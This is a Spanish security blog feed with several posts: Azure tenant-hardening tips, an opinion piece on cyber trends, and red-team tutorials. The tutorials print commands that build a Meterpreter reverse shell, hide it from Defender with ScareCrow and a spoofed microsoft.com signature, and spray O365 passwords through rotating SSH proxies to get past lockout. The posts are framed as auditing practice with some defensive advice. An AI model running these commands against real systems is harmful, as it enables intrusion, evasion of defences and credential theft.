href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOvVejtVcGfFpD-948FsWhl6D7dO2FYeoc9JhOKOEuhAowDqt5JT9je6QdXnifDZOJFBL61AzwBrgOM7wATNWRJeJWc4uB3FhGSRgD-fW3Dgsk21hAp87jFinXMifgmsyeB_3N-n6pH2MJT3sS5zuhBYAqCdGHDk02cfmkBhwcGlL4ELpKPpIUSMws-uA/s847/Captura%20de%20pantalla%202024-01-02%20a%20las%2010.39.22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="847" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhOvVejtVcGfFpD-948FsWhl6D7dO2FYeoc9JhOKOEuhAowDqt5JT9je6QdXnifDZOJFBL61AzwBrgOM7wATNWRJeJWc4uB3FhGSRgD-fW3Dgsk21hAp87jFinXMifgmsyeB_3N-n6pH2MJT3sS5zuhBYAqCdGHDk02cfmkBhwcGlL4ELpKPpIUSMws-uA/w640-h276/Captura%20de%20pantalla%202024-01-02%20a%20las%2010.39.22.png" width="640" /></a></div><br /><i>Es importante que los usuarios no puedan registrar aplicaciones, ya que estamos dejando que ellos "deleguen" sus permisos sobre el tenant y los recusos a aplicaciones que pueden que no sean las correctas, las de las empresa. Podeís ver el funcionamiento de la herramienta O365 Stealer y como aprvechamos esta característica para registrar una aplicación externa, con los permisos sobre el tenant de la víctima.</i></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/xyDeW9BSMH8" width="320" youtube-src-id="xyDeW9BSMH8"></iframe></div><br /></div><div><i>La segunda opción, <span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;">Impedir que los usuarios que no sean administradores creen inquilinos</span><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;"> </span> , prohibe que un usuario de tu organización registre un nuevo tenant con su cuenta. Imagina que tienes un @empresa.com y tu usuario registra un tenenat nuevo empressa.com en el que es global admin. Estaría abriendo el camino a poder engañar a los usuarios legítimos. En alguna ocasión me he encontrado alumnos que querían usar su cuenta empresarial para crear un tenant desde cero para el curso y no les dejaba... </i></div><div><i><br /></i></div><div><i>Otra opción a controlar, </i><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;">Los usuarios pueden crear grupos de seguridad</span><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;"> ,</span><i> simplemente no le encuentro la necesidad de que un usuario deba hacerlo, y puede ser un vector descontrolado a la hora de tener usuarios con más permisos de la cuenta sobre algún recurso de manera descontrolada.</i></div><div><i><br /></i></div><div><i>Usuarios Invitados: Debemos establecer cual es el comportamiento que queremos para estos usuarios por defecto. Soy partidario de ser lo más restrictivo por defecto para estos usuarios, y luego jugar con los roles concretos en casos puntuales para colaboradores que así lo requieran. Si quieres ampliar un poco más sobre qué pueden hacer en cada uno de los niveles, <a href="https://learn.microsoft.com/es-es/entra/identity/users/users-restrict-guest-permissions" target="_blank">este es tu enlace.</a></i></div><div><i><br /></i></div><div><i><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;">Restringir el acceso al Centro de administración de Microsoft Entra </span>marcado a si. Lo que tenemos que tener en cuenta es que con esta medida, estamos controlando que los usuarios no administradores no puedan entrar a portal.azure.com , pero si que pueden entrar a administrar Microsoft Entra mediante Powershell, Azure cli, Ms Graph, etc. La manera correcta de bloquear este acceso es mediante Acceso Condicional a la aplicación: Windows Azure Service Management Api</i></div><div><i><br /></i></div><div><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;">Permitir a los usuarios conectar su cuenta profesional o educativa con LinkedIn</span><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;"> </span><i>No me gusta esta opción, ya que prefiero usar el correo corporativo para mis usuarios y así tenerlos controlados.</i></div><div><i><br /></i></div><div><i><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;">Mostrar mantener el usuario con la sesión iniciada</span><span style="background-color: white; color: #323130; font-family: "Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, "system-ui", Roboto, "Helvetica Neue", sans-serif; font-size: 13px;"> </span>Aunque no tiene nada que ver con los tokens, si con la cookie. Mejor hacer que cuando hace login un usuario no le pregunte si quiere permanecer conectado.</i></div><div><i><br /></i></div><div>Mañana seguimos con más...</div><div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-55918503570156422922024-01-02T10:05:00.000+01:002024-01-02T10:05:13.419+01:00Día 1: Revisa la configuración de Azure<p> Estimados amigos de Inseguros !!!</p><p>Vamos a iniciar esta serie seria sobre configuraciones y aspectos a revisar en la configuración de Azure.</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzyZHD41E_xGuBFxYOBVAGxaR9ebKqKLUjPj-5-NP0Q_3ErUFO-SvlNCCFl8GXK5lblceoe4doi3Fd7NzNwp0UcH8ljM3-oObUdYrvW55MQfm1APLo8dtLzeGmgX9hMLAFeXRUkTBa2uP_751-umJ4xERuCDEIb5uBgl5jtghPzjhHXvlcQB8g2Kw-iQ-/s1200/formacion.seguridadsi.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPzyZHD41E_xGuBFxYOBVAGxaR9ebKqKLUjPj-5-NP0Q_3ErUFO-SvlNCCFl8GXK5lblceoe4doi3Fd7NzNwp0UcH8ljM3-oObUdYrvW55MQfm1APLo8dtLzeGmgX9hMLAFeXRUkTBa2uP_751-umJ4xERuCDEIb5uBgl5jtghPzjhHXvlcQB8g2Kw-iQ-/w640-h334/formacion.seguridadsi.com.png" width="640" /></a></div><p>Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </p><h4 style="text-align: left;"><b>Let´s Go.</b></h4><p></p><ul style="text-align: left;"><li><i>Propiedades predeterminadas del directorio. <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties">Comprobar.</a></i></li></ul><div><i>Deberíamos comprobar que tenemos actividades las opciones de seguridad predeterminadas, que son el mínimo que cabe esperar de una configuración segura.</i></div><div><i><br />En resumidas cuentas, lo que hace este Settting es obligar a los administrador a usar el MFA y bloquear protocolos de autenticación "legacy" como smtp y pop3. Te sugiero que leas en detalle el <a href="https://learn.microsoft.com/es-es/entra/fundamentals/security-defaults?WT.mc_id=Portal-Microsoft_AAD_IAM" target="_blank">artículo</a> donde explica en detalle las consideraciones previas.</i></div><div><br /></div><div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><p></p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-43754870213539058232023-12-13T08:23:00.000+01:002023-12-13T08:23:42.441+01:00Pronto vendrán las tendencias de ciber para 2024... entrará la IA? xD<p> Estimados amigos de Inseguros !!!</p><p>Se viene la navidad, el final de año, y SEGURO que vamos a encontrar gente que no tiene ni puñetera idea hablando del futuro.</p><p>Este sin duda ha sido el año de la IA. En todos los congresos ha habido muy buenas, y otras muy malas, conferencias con este disciplina.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJIK3lRhXTB5j55EKg4tWADC-h76sJAzRghbIYRzJQgSRbzV8W7O0GEaNaPt17o0jQ4jJBbw-EJ3rBLOCc3cpiFqmqV8Yj1d52RrIwnuuffHj0zyHjzylfYZgqwVcAQDQUJIicA5GjD4MVYhwmkiqjVDCd4lZfPgITp0hkB_gOz8_Pw6UU7DeopPV-Mz2/s1199/65248653_605.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="674" data-original-width="1199" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJIK3lRhXTB5j55EKg4tWADC-h76sJAzRghbIYRzJQgSRbzV8W7O0GEaNaPt17o0jQ4jJBbw-EJ3rBLOCc3cpiFqmqV8Yj1d52RrIwnuuffHj0zyHjzylfYZgqwVcAQDQUJIicA5GjD4MVYhwmkiqjVDCd4lZfPgITp0hkB_gOz8_Pw6UU7DeopPV-Mz2/w640-h360/65248653_605.jpg" width="640" /></a></div><p><br /></p><p>"Expertos" usando Chatgpt... vamos a ver amigo, que eso no es saber de IA. Que eso es como saber que el ibuprofeno quita el dolor de cabeza y creerse médico...</p><p>Las modas y lo modales ( en la red) de hoy en día dictan mucho de ser la realidad de la calle.</p><p>Las empresas de mi entornos siguen sufriendo ataques de Ransomware. Siguen sufriendo ataques de copromiso del CEO ( Timos en las facturas). Siguen sufriendo ataques de DDOS en sus E-commerce. Siguen sufriendo robo de suscripciones en Azure para ganar capacidad de cómputo y minar BTC...</p><p>Las empresas de mi entorno siguen con los vectores de ataque tradicionales... Phishing, sistemas sin parchear y debilidad en credenciales( principalmente carencia de MFA)</p><p>A la suma de estpudices y modas, que no digo que no haya que ir gestionándolas, se suman los fabricantes... O los red teamers !! Herramientas de phishing con IA que saben crear mejores textos que el famoso: <i>Soy una chicà de la matre Rusia diszpuest∞a a conocerte</i>... Esto no es la evolución de la IA...</p><p>Los aplicativos de red que te prometen la IA, necesitan un modelo de aprendizaje largo, contrastado muchas veces con el humano, ya sabes, realizar muchos circuitos funcionales para enseñar que es bueno y que es malo... Mi experiencia hasta la fecha es que TODOS son vulnerables, al igual que los EDR, los ETC y LOS JPG... xDDD</p><p>Vemos muchos ataques contra la IA, contra los modelos de entrenamiento. Para que lo entiendas, coger 10 android y 10 coches y engañar a Google maps con la densidad de tráfico... y SE que la IA se usará para el bien y para el mal. Pero a donde voy...</p><p>Voy a reirme de las tendencias y como he dicho de las modas. Que creeis que va a ser más habitual, un ataque contra una VPN por credenciales débiles o leakeadas, o un ataque contra el algoritmo de noseque que produzca nosecuantos?</p><p>Como van a entrar los malos en más ocasiones, con un phishing al teams con una factura de un proveedor, o con un deep fake en video de tu jefe con aspecto de haberse pasado con el Botox pidiendo algo raro?</p><p>Al final, hay mucha gente que vende del humo, de la prensa, de escribir tonterias, que les generan publicidad...</p><p>Yo después de muchos años ya en la ciber, cuando hablo con mis clientes, les recomiendo practicamente las mismas medidas. Inventarias, analizar riesgo, implementar fortificación, modelo de administración tiers---luego basado en privilegios...Entrenamiento al humano. Pentesting constante... Mejora en las capacidades de detección...</p><p>Porque si, ese Dark Trace o similar está muy bien, pero va a ser incapaz de parar un ataque a un e-commerce porque alguien ha encontrado un fallo en la generación de cupones de descuento y está comprando pequeños pedidos para luego revenderlos... Digo esto por decir algo. Para que entiendas que el sentido común siempre es la mejor solución.</p><p>Otro día, por cambiar de la IA, un amigo mio me decía que ahora todo es IOT, que todos los eventos que va hablan del IOT. Yo le intentaba explicar a mi amigos dos cosas:</p><p>1.- Si tienes IOT en tu empresa será un vector más, sino, NO. xD</p><p>2.- Cuando el IOT va sobre TCP/IP no deja de ser una LAN/VLAN más. No hay "secreto". Tendrás que fortificar el entorno como te deje el fabricante, tendrás que poner controles entre los entornos de explotación y monitorización. Tendrás que poner medidas de seguridad que sean capaces de detecar anomalías... como en el commerce... como que un cliente ha comprado 10 veces con un ticket regalo?... como que un plc ahora tiene el doble de tráfico noseque... REGLAS DE NEGOCIO... pero no le veo la diferencia a que sea IOT, OT o sanvinagre... volvemos a las modas...</p><p><b>Y a la parte que me interesa, porque yo vendo auditorias y cursos, es la de estar preparado.</b></p><p>Cuando hablo con un cliente nuevo y me dice que tiene la seguridad bien, porque tiene un UTM y un Edr low cost, me pongo a temblar. En estos casos es la persona el riesgo :-) porque no sabe !!! Tu que lees este blog si sabes de ciberseguridad, pero hay mucha gente que NO, y cree que SI, y lo peor de todo es que no se forma. </p><p>La formación es lo más importante que tenemos, en la vida personal y profesional, y debemos estar constantemente preparados. Leyendo blogs, escuchado podcast, asistiendo a seminarios, incluso de vendors !!! no para comprarle los aburridos clicks de su solución, sino para aprender lo que hacen los malos y los buenos.</p><p>En un curso mío de <a href="https://formacion.seguridadsi.com/courses/v-edicion-seguridad-en-entornos-microsoft" target="_blank">Seguridad Microsoft</a> aprendemos desde que es Mitre, comentamos TTP´s hasta llegamos a hacerlos en Linux con las tools que ya sabes. Imaginas a tu CIO o Sysadmin haciendo esto? imaginas la cara que se les queda cuando haces cualquier dump de hashes y luego los usas como se quedan?</p><p>O cuando hacemos el curso de <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Hacking Azure</a>. Hay alumnos implantadores de click rápido que alucinan... y pentester que están ampliando sus conocmientos. Pero también hay algun CIO que hace el curso y COMPRENDE lo que tiene delante y se conciencia de tomar las acciones correctas...</p><p>Pero la triste realidad es que mucha gente va al equisday del fabricante, come buen jamón, el account lo cuida y le renueva al año la "tranquilidad total". Luego pasa lo que pasa.</p><p>Por eso amigo lector, huye de las modas, de los hype, de las tendencias, de los gurús, huye de gente como yo xDDDD y picotea de aquí y de allá, y fórmate de la mejor manera, pero el sentido común es algo que no se logra muchas veces con libros xDDD</p><p><br />Espero que te hayas entretenido un rato con el post, gracias por leerme !!!</p><p><br /></p><p><br /></p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-44825263417634395572023-08-29T12:57:00.004+02:002023-08-29T12:57:18.677+02:00EDR o no EDR, esa es la cuestión: Bypass Defender con ScareCrow<p> Estimados amigos de Inseguros !!!</p><p>Dentro de las fases que acometen los malos es el de saltarse las medidas defensivas. Y como tal, son ejercicios que debemos de hacer en nuestras organizaciones para saber como se compartan el resto de medida.</p><p>En esta ocasión vamos a lanzar una shell Meterpreter contra un Windows parcheado y con Defender y ver como no se entera. Lo vamos a hacer con la herramienta <a href="https://github.com/Tylous/ScareCrow" target="_blank">ScareCrow</a>.</p><p>Esta herramienta es muy interesante porque firma el binario con la clave pública del dominio https que le digamos, parchear AMIS, ETW y hacer una seria de bypass EDR con la manera que tiene que cargar el código en memoria, para detectar lo que está hookeando el EDR y cargárselo. Si quieres bajar a cómo lo hace, hay dos post muy interesantes. <a href="https://www.optiv.com/insights/source-zero/blog/endpoint-detection-and-response-how-hackers-have-evolved" target="_blank">Post 1</a> y <a href="https://www.optiv.com/insights/source-zero/blog/edr-and-blending-how-attackers-avoid-getting-caught" target="_blank">Post 2</a> donde explica los hooks y las syscall que hace.</p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglqaMHG8seR6WaY2m8ckSAf9969A1_f5uqKPI4hDu63gF__1kKhMZnVteLLRTlvNQzvMPaQWhsZdajZI0fOcrLsM4OfU7vZZn-1sc2c17HHWwb4ofVF99ExoLljNiKGYuTjvBrmBZexm3SO2gOZLNnnx_ToPqC1-639P-VfTOPfUwhRhq0E8PlodnGkSHt/s316/ScareCrow.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="288" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglqaMHG8seR6WaY2m8ckSAf9969A1_f5uqKPI4hDu63gF__1kKhMZnVteLLRTlvNQzvMPaQWhsZdajZI0fOcrLsM4OfU7vZZn-1sc2c17HHWwb4ofVF99ExoLljNiKGYuTjvBrmBZexm3SO2gOZLNnnx_ToPqC1-639P-VfTOPfUwhRhq0E8PlodnGkSHt/s1600/ScareCrow.png" width="288" /></a></div><br /><p>El proceso de instalación es muy sencillo.</p><p>Se clona el repositorio, se instalan dependencias</p><pre class="notranslate" style="border-radius: 6px; box-sizing: border-box; color: #1f2328; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><i>go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
go get github.com/Binject/debug/pe
go get github.com/awgh/rawreader</i></code></pre><p>Se comprueba que existen estos paquetes y sino, ya sabes...</p><pre class="notranslate" style="border-radius: 6px; box-sizing: border-box; color: #1f2328; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><i>openssl
osslsigncode
mingw-w64</i></code></pre><p>Y se compila:</p><pre class="notranslate" style="background-color: var(--bgColor-muted, var(--color-canvas-subtle)); border-radius: 6px; box-sizing: border-box; color: #1f2328; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><i>go build ScareCrow.go</i></code></pre><p>Ahora vamos a generar nuestra shell, por ejemplo con meterpreter. Generamos una shell con msfvenemom y ponemos a escuchar.</p><p></p><i>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.50 LPORT=12345 -f raw -o fud.bin </i><div><i>msf6 > use exploit/multi/handler </i></div><div><i>msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp </i></div><div><i>msf6 exploit(multi/handler) > set lport 12345 </i></div><div><i>msf6 exploit(multi/handler) > set lhost 192.168.100.50
msf6 exploit(multi/handler) > run </i></div><div><br /></div><div>Ahora tomamos la shell y se la pasamos a la herramienta</div><div><br /></div><div><i>./ScareCrow -I fud.bin -domain www.microsoft.com -encryptionmode AES </i></div><div><br /></div><div>Ejecutamos en un Windows con Defender y listo. Si te no va a la primera, prueba a compilar otro binario, a la segunda va.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0Nm-iOPYvQwkHaNM38CYNb4gqiUFdlwuwLGh8VHxW895Awrckq2PqvpZAM1ZE90dgi5lfxXKzUMoh8v5oxAkZXkeoEMv62A_E_pO9p0xAAjHZJsawcoDM9PnHnJsNFNSZm7_2FW9SKksw2wKKzZxhS40pK9EJXO7DZBiw9wTqa8-ibSlvadDMr68ZDeT/s883/Captura%20de%20pantalla%202023-08-29%20a%20las%2012.48.06%20(2).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="383" data-original-width="883" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0Nm-iOPYvQwkHaNM38CYNb4gqiUFdlwuwLGh8VHxW895Awrckq2PqvpZAM1ZE90dgi5lfxXKzUMoh8v5oxAkZXkeoEMv62A_E_pO9p0xAAjHZJsawcoDM9PnHnJsNFNSZm7_2FW9SKksw2wKKzZxhS40pK9EJXO7DZBiw9wTqa8-ibSlvadDMr68ZDeT/w640-h278/Captura%20de%20pantalla%202023-08-29%20a%20las%2012.48.06%20(2).png" width="640" /></a></div><br /><div>Como puedes adivinar, confiar toda nuestra defensa en una sola línea de defensa es un error. <br /><br /></div><div>Por ejemplo, en mi caso podría haber hecho varias cosas. Podríamos haber bloqueado la ip de origen del equipo que compartido el binario que me ha pillado la primera vez. Podría haber detectado tráfico http entre equipos de una lan que apriori no deberían. Hay muchas maneras de intentar monitorizar lo que pasa es nuestros entornos y así poder luchar contra ataques de este tipo.</div><div><br /></div><div>Para ello, lo mejor es conocer nuestros sistemas en profundidad y para eso tienes el <a href="https://formacion.seguridadsi.com/courses/IV-edicion-seguridad-en-entornos-microsoft" target="_blank">mejor curso de experto en Ciberseguridad Microsoft del momento</a>. SI. Mejor que muchos "en inglés" muy famososos que te enseñan 4 cosas. </div><div><br /></div><div>Si estás trabajando, píde los créditos de formación que tienes disponibles y vamos a pasar 3 meses entretenidos aprendiendo muy mucho Ciberseguridad. </div><div><br /></div><div>Si necesitas más información, en la web puedes pedir una cita y charlamos.</div><div><br /></div><div>Gracias por leerme !!!</div><div><div class="separator" style="clear: both; text-align: center;"><br /><br /></div><br /><br /><p></p><p></p></div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-11653502422374585662023-08-25T10:42:00.002+02:002023-08-25T10:46:23.307+02:00Fuerza Bruta contra O365 mediante proxy para evadir bloqueos:Trevor<p> Estimados amigos de Inseguros!!!</p><p>Un de las primeras cosas que debemos mirar a la hora de auditar nuestras infraestructuras es la calidad de las contraseñas, de nuestros empleados o clientes. Realizar una campaña de fuerza bruta con algunas passwords conocidas, relacionadas con el negocio, no me parece una mala idea.</p><p>Existen distintas aplicaciones con las que podemos acometer esta misión, pero Azure implementa un mecanismo denominado Smart Lockout que va a detectar los intentos de inicio de sesión fallidos y nos va a bloquear. </p><p>Teniendo como objetivo saltarnos esta medida, vamos a usar algo ya conocido, y es el uso de proxys para repartir las peticiones y así hacer más dificíl a los sistemas defensivos la detección.</p><p>Lo vamos a realizar con la herramienta <a href="https://github.com/blacklanternsecurity/TREVORspray" target="_blank">TrevorSpray</a>. Lo que me gusta de este proyecto es que el autor ha publicado aparte el componente proxy, por lo que mediante proxychains, como hacemos con TOR, podemos usar los nodos para tirar cualquier comando, pero vamos a centrarnos en la fuerza bruta...</p><p>Las instrucciones son muy sencillas:</p><pre style="border-radius: 6px; box-sizing: border-box; color: #1f2328; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 0px; margin-top: 0px; overflow-wrap: normal; overflow: auto; padding: 16px; word-break: normal;">pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray</pre><p> export PATH=$PATH:/home/kinomakino/.local/bin</p><p>Como con cualquier otra herramienta, le damos un vistazo a las opciones. Me gusta indicar que no haga intentos de bypass del MFA, ya que podría generar mucho ruido. En esta fase nos centramos en obtener credenciales válidas, ya veremos luego como las explotamos.</p><p>Un comando sencillo podría ser: trevorspray -u lista_de_usuarios -p 'Password' -nl </p><p>Ahora bien, tiramos la herramienta, y lo que suele pasar es que los filtros Smart Lockout nos cazen y empiece a decirnos que las cuentas están bloqueadas</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe0i1b0EThx2O9ZmhuFJ4IQh-iEK6C0hec05bLzxN3e5akQbNwwAhO5LOBIRz8jm_yMlUH8NNAJoY-KFSJgWJGAv6rbe4GImtA8_GLdhGUfpTfDT1DLry3w_HTPKjdd4JjEpUWJVqWep9wwtvkT-G94P9U3ULZTb6Boslr4SJ4l-T7nJzUXu9CeVKkPZL/s1278/Captura%20de%20pantalla%202023-08-24%20a%20las%2012.40.54%20(2).png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="1278" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe0i1b0EThx2O9ZmhuFJ4IQh-iEK6C0hec05bLzxN3e5akQbNwwAhO5LOBIRz8jm_yMlUH8NNAJoY-KFSJgWJGAv6rbe4GImtA8_GLdhGUfpTfDT1DLry3w_HTPKjdd4JjEpUWJVqWep9wwtvkT-G94P9U3ULZTb6Boslr4SJ4l-T7nJzUXu9CeVKkPZL/w640-h152/Captura%20de%20pantalla%202023-08-24%20a%20las%2012.40.54%20(2).png" width="640" /></a></div><div><br /></div>Ahora es donde metemos la magia y le indicamos que queremos "canalizar" el ataque en uno o más ssh y voila !!!<div><br /></div><div> trevorspray -u trevor-users2.txt -p 'cosas' 'cosas2' 'cosas3' 'cosas4' -nl --ssh kinomakino@40.77.175.84 kinomakino@51.1.106.102 kinomakino@20.1.198.6 kinomakino@20.4.128.167 --jitter 15 <br /><div><br /></div><div>Desde el punto de vista defensivo, podemos configurar este comportamiento solo si tenemos P1. Si no lo tenemos, funcionará el lockout, pero no podemos configurar valores personalizados.</div><div><br /></div><div>También sería interesante monitorizar estos log, por ejemplo, desde el visor de inicios de sesión desde Entra ID </div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif" style="color: #050505;"><span style="background-color: white; font-size: 15px;"><br /></span></span></div><div><span face="system-ui, -apple-system, system-ui, .SFNSText-Regular, sans-serif"><div class="separator" style="clear: both; color: #050505; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK7MnJWRTS2HxGeBx9WtNl99URNINzhT5w597L6_3uiAZicLJddfBYVyzC_7pYuBr36RRRHaKWwdV8S_hIO2xczexDV7jhdCB79iQiir3cjXP3WCv2a0O8CE2mD7pdkVRusgxUHjQP2s0ckIDWGW2KuDI2RiZStnU2tszbnGuWxDKY8wIFpdhBsDyjk_52/s1478/Captura%20de%20pantalla%202023-08-25%20a%20las%2010.31.43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="1478" height="142" 